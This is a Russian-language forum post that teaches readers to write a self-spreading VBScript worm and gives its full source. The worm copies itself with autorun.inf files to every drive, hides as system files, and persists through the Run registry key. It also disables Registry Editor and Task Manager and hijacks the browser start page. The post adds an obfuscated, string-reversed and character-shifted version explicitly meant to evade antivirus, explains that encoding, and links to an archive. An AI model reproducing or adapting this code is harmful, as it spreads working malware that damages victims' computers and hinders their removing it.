SizeKing
Сообщений: 41
Оценки: 0
Присоединился: 2010-03-03 10:48:33.933333
|
Что такое vbs? это скриптовый язык вишуал басик.
Откройте блокнот, сохраните его под именем 1.txt затем переименуйте 1.txt в 1.vbs и откройте 1.vbs - внем можно писать код.
Сейчас многие антивирусы сразу блокируют vbs, но я расскажу вам технологию написания и защиты от антивирусов.
Что должен делать vbs?
нужно создать бесконечный цикл с задержкой в несколько секунд
и прописывать вирус в авторан
дальше нужно организовать цикл с перечислением англ алфавита от A до Z после чего в цикле последовательно копировать файл вируса на все диски (а вдруг пользователь воткнет флэшку :)) )
вместе с копией вируса должен создаваться файл autorun.inf который должен содержать такой текст
[autorun]
shellexecute=wscript.exe 1.vbs
где 1.vbs это имя вируса который лежит рядом с этим файлом
файл autorun.inf нужен чтобы вирус запускался автоматически (например когда воткнули флэшку с этим содержимым)
еще нужно не забыть скрывать все файлы делая их системными, чтобы ламер не смог их удалить
и главное, нужно отключить реестр и диспетчер задач.
И вот когда движек готов можно в нем реализовать любые действия
например можно забить компьютер хламом, текстовыми файлами с различным содержимым, ламак будет чистить комп год от них ))
посмотрим на готовый вирус
on error resume next
pflag=1
strr=array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z")
for q=0 to ubound(strr)
if WScript.ScriptFullName = strr(q) & ":\" & WScript.ScriptName then
pflag=0
end if
next
if pflag=1 then
Set S = CreateObject("Wscript.Shell")
s.run "wmplayer.exe "_
&"http://on-tv.ru/asx/tv_id4.asx "_
&"http://on-tv.ru/asx/tv_id500.asx "_
&"http://on-tv.ru/asx/tv_id11.asx "_
&"http://www.rambler-audio.ru/asx/video/special/eurosportnews/eurosport.asx "_
&"http://on-tv.ru/asx/tv_id642.asx "_
&"http://on-tv.ru/asx/tv_id59.asx "_
&"http://on-tv.ru/asx/tv_id568.asx "_
&"http://on-tv.ru/asx/tv_id10.asx "_
&"http://www.impacttelevision.org/live/live270.asx "_
&"http://www.tvr.by/liveair/btv.asx "_
&"http://on-tv.ru/asx/tv_id428.asx "_
&"http://www.kulturatv.kiev.ua/Kultura-EU.asx "_
&"http://media.wnet.ua/lists/5tv.asx"
end if
dost1=1
Do
Wscript.sleep(15000)
if dost1=1 then
Wscript.sleep(15000)
end if
strr=array("A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z")
for q=0 to ubound(strr)
Set FileSystemObject = CreateObject("scripting.filesystemobject")
if not FileSystemObject.FileExists (strr(q) & ":\" & WScript.ScriptName) then
if not strr(q) = "C" then
Set fso = CreateObject("Scripting.FileSystemObject")
Set tf = fso.CreateTextFile(strr(q) & ":\" & "autorun.inf",True)
tf.WriteLine("[autorun]")
tf.WriteLine("shellexecute=wscript.exe " & WScript.ScriptName)
tf.Close
end if
Set FileSystemObject = CreateObject("scripting.filesystemobject")
FileSystemObject.copyfile WScript.ScriptFullName,strr(q) & ":\" & WScript.ScriptName
Set flt = fso.GetFile(strr(q) & ":\" & WScript.ScriptName)
flt.Attributes = 6
if not strr(q) = "C" then
Set flt = fso.GetFile(strr(q) & ":\" & "autorun.inf")
flt.Attributes = 6
end if
end if
next
Set Shell = CreateObject("Wscript.Shell")
Shell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MediaPlayer","C:\" & WScript.ScriptName
if dost1=1 then
dost1=0
Set Shell = CreateObject("Wscript.Shell")
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.google.ru/#hl=ru&source=hp&q=vProFlood&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=vProFlood&fp=efd878c0817b5b99"
Set Shell = CreateObject("Wscript.Shell")
Shell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD"
Set S = CreateObject("Wscript.Shell")
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\disabletaskmgr","1","REG_DWORD"
Set S = CreateObject("Wscript.Shell")
s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Program vProFlood"
s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","Program vProFlood"
Set S = CreateObject("Wscript.Shell")
s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","Program vProFlood"
Shell.Run "iexplore.exe http://www.google.ru/#hl=ru&source=hp&q=vProFlood&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=vProFlood&fp=efd878c0817b5b99"
Shell.Run "firefox.exe http://yandex.ru/yandsearch?text=vProFlood&lr=2&stpar2=%2Fh1%2Ftm319%2Fs1&stpar4=%2Fs1&stpar1=%2Fu0"
end if
loop
можете запустить его, он не смертелен, покажет вам онлайн каналы в медиа плеере :)
а теперь помотрим как защитить этот код от антивирусов и любопытных ламеров
вот во что он превратился
c=c & "��nmmj��dg�blc�� .sD0#;/p_nrq$/qD0#;2p_nrq$/qD0#7/1krD0#/fD0#;0p_nrq$0;"
c=c & "pj$bmmjDmpNt;rvcr=fap_cqbl_w-sp,vcbl_w--8nrrf�cvc,vmdcpgd �lsP,jjcfQ�� "
c=c & "77`3`5/6.a656bdc;nd$bmmjDmpNt;om$d;o_$;pj$cjemmE)0@#.B#)?@#.B#/6#/B#6@#"
c=c & ".B#C@#.B#D7#.B#;Elr`$bmmjDmpNt;o$nf;capsmq$sp;jf!-sp,cjemme,uuu--8nrrf�"
c=c & "cvc,cpmjnvcg �lsP,jjcfQ�� bmmjDmpNt�k_pempN * elgprQbcxgj_amJZ{C237D0.."
c=c & "??..+6.D7+@/./+/6.3+.2.DD324yZBGQJAZRMMP]QCQQ?JA]WCIF �crgpuecp,q��' jj"
c=c & "cfQ,rngpaqU &rach`Mcr_cpA�;�Q�rcQ�� bmmjDmpNt�k_pempN * lmgr_xgl_epMbcp"
c=c & "crqgecPZlmgqpcTrlcppsAZRL�qumblgUZrdmqmpagKZCP?URDMQZKJIF �crgpuecp,q��"
c=c & " bmmjDmpNt�k_pempN * pcluMbcpcrqgecPZlmgqpcTrlcppsAZRL�qumblgUZrdmqmpag"
c=c & "KZCP?URDMQZKJIF �crgpuecp,q��' jjcfQ,rngpaqU &rach`Mcr_cpA�;�Q�rcQ�� BP"
c=c & "MUB]ECP * / * pekiq_rcj`_qgbZkcrqwQZqcgagjmNZlmgqpcTrlcppsAZqumblgUZrdm"
c=c & "qmpagKZcp_urdmQZSAIF crgpuecp,q��' jjcfQ,rngpaqU &rach`Mcr_cpA�;�Q�rcQ�"
c=c & "� BPMUB]ECP �*/�* qjmmRwprqgecPcj`_qgBZKCRQWQZQCGAGJMNZLMGQPCTRLCPPSAZQ"
c=c & "UMBLGUZRDMQMPAGKZCP?URDMQZPCQS]RLCPPSA]WCIF �crgpUecP,jjcfQ��' jjcfQ,rn"
c=c & "gpaqU &rach`Mcr_cpA�;�jjcfQ�rcQ�� 77`3`5/6.a656bdc;nd$bmmjDmpNt;om$d;o_"
c=c & "$;pj$cjemmE)0@#.B#)?@#.B#/6#/B#6@#.B#C@#.B#D7#.B#;Elr`$bmmjDmpNt;o$nf;c"
c=c & "apsmq$sp;jf!-sp,cjemme,uuu--8nrrf * ce_N�rp_rQZlg_KZpcpmjnvC�rclpcrlGZr"
c=c & "dmqmpagKZcp_urdmQZPCQS]RLCPPSA]WCIF �crgpUecP,jjcfQ��' jjcfQ,rngpaqU &r"
c=c & "ach`Mcr_cpA�;�jjcfQ�rcQ��.;/rqmb��lcfr�/;/rqmb�dg��ck_LrngpaQ,rngpaQU�$"
c=c & "� Z8A * pcw_jN_gbcKZlsPZlmgqpcTrlcppsAZqumblgUZrdmqmpagKZCP?URDMQZCLGFA"
c=c & "?K]J?AMJ]WCIF �crgpUecP,jjcfQ��' jjcfQ,rngpaqU &rach`Mcr_cpA�;�jjcfQ�rc"
c=c & "Q��rvcl��dg�blc��dg�blc��4�;�qcrs`gprr?,rjd��' dlg,lspmrs_ �$� Z8 �$�'o"
c=c & "&pprq&cjgDrcE,mqd�;�rjd�rcQ��lcfr� A �;�'o&pprq�rml�dg��4�;�qcrs`gprr?,"
c=c & "rjd��'ck_LrngpaQ,rngpaQU�$� Z8 �$�'o&pprq&cjgDrcE,mqd�;�rjd�rcQ��ck_Lrn"
c=c & "gpaQ,rngpaQU�$� Z8 �$�'o&pprq*ck_LjjsDrngpaQ,rngpaQU�cjgdwnma,rach`Mkcr"
c=c & "qwQcjgD��' rach`mkcrqwqcjgd,elgrngpaq &rach`Mcr_cpA�;�rach`MkcrqwQcjgD�"
c=c & "rcQ��dg�blc��cqmjA,dr��'ck_LrngpaQ,rngpaQU�$� �cvc,rngpaqu;crsacvcjjcfq"
c=c & " &clgJcrgpU,dr��' [lspmrs_Y &clgJcrgpU,dr��'cspR* dlg,lspmrs_ �$� Z8 �$"
c=c & "�'o&pprq&cjgDrvcRcr_cpA,mqd�;�dr�rcQ��' rach`MkcrqwQcjgD,elgrngpaQ &rac"
c=c & "h`Mcr_cpA�;�mqd�rcQ��lcfr� A �;�'o&pprq�rml�dg��lcfr�'ck_LrngpaQ,rngpaQ"
c=c & "U�$� Z8 �$�'o&pprq&�qrqgvCcjgD,rach`MkcrqwQcjgD�rml�dg��' rach`mkcrqwqc"
c=c & "jgd,elgrngpaq &rach`Mcr_cpA�;�rach`MkcrqwQcjgD�rcQ�'pprq&blsm`s�mr�.;o�"
c=c & "pmd��' X * W * V * U * T * S * R * Q * P * O * N * M * L * K * J * I * "
c=c & "H * G * F * E * D * C * B * A * @ * ? &w_pp_;pprq��dg�blc��'...3/&nccjq"
c=c & ",rngpaqU��lcfr�/;/rqmb�dg��'...3/&nccjq,rngpaqU��mB��/;/rqmb��dg�blc�� "
c=c & "vq_,tr3-qrqgj-_s,rclu,_gbck--8nrrf $��] �vq_,SC+_psrjsI-_s,tcgi,tr_psrj"
c=c & "si,uuu--8nrrf $��] �vq_,602bg]tr-vq_-sp,tr+lm--8nrrf $��] �vq_,tr`-pg_c"
c=c & "tgj-w`,ptr,uuu--8nrrf $��] �vq_,.50ctgj-ctgj-epm,lmgqgtcjcrra_nkg,uuu--"
c=c & "8nrrf $��] �vq_,./bg]tr-vq_-sp,tr+lm--8nrrf $��] �vq_,643bg]tr-vq_-sp,t"
c=c & "r+lm--8nrrf $��] �vq_,73bg]tr-vq_-sp,tr+lm--8nrrf $��] �vq_,024bg]tr-vq"
c=c & "_-sp,tr+lm--8nrrf $��] �vq_,rpmnqmpsc-quclrpmnqmpsc-j_gacnq-mcbgt-vq_-s"
c=c & "p,mgbs_+pcj`k_p,uuu--8nrrf $��] �vq_,//bg]tr-vq_-sp,tr+lm--8nrrf $��] �"
c=c & "vq_,..3bg]tr-vq_-sp,tr+lm--8nrrf $��] �vq_,2bg]tr-vq_-sp,tr+lm--8nrrf $"
c=c & "��] �cvc,pcw_jnku �lsp,q��' jjcfQ,rngpaqU &rach`Mcr_cpA�;�Q�rcQ��lcfr�/"
c=c & ";e_jdn�dg��rvcl��dg�blc��.;e_jdn��lcfr�ck_LrngpaQ,rngpaQU�$� Z8 �$�'o&p"
c=c & "prq�;�ck_LjjsDrngpaQ,rngpaQU�dg��'pprq&blsm`s�mr�.;o�pmd��' X * W * V * "
c=c & "U * T * S * R * Q * P * O * N * M * L * K * J * I * H * G * F * E * D * "
c=c & "C * B * A * @ * ? &w_pp_;pprq��/;e_jdn��rvcl�cksqcp�pmppc�lm��bmmjDmpNt"
c=c & "�888q_rpct888%":for i=1 to len(c):t=chr(asc(mid(c,i,1))+2):k=k+t:next:execute StrReverse(k)
как кодировать?
превратить вирус в строку и перечитать задом наперет, вычесть из кода каждого символа 1
запихнуть полученный результат в переменную и с помощью vbs написать движек обратного перекодирования
продолжение в архиве, описание и все необходимое
http://vproflood.onfind.net/vprsrv.rar
:)
|
Создаем вирус червь бот на vbs - 
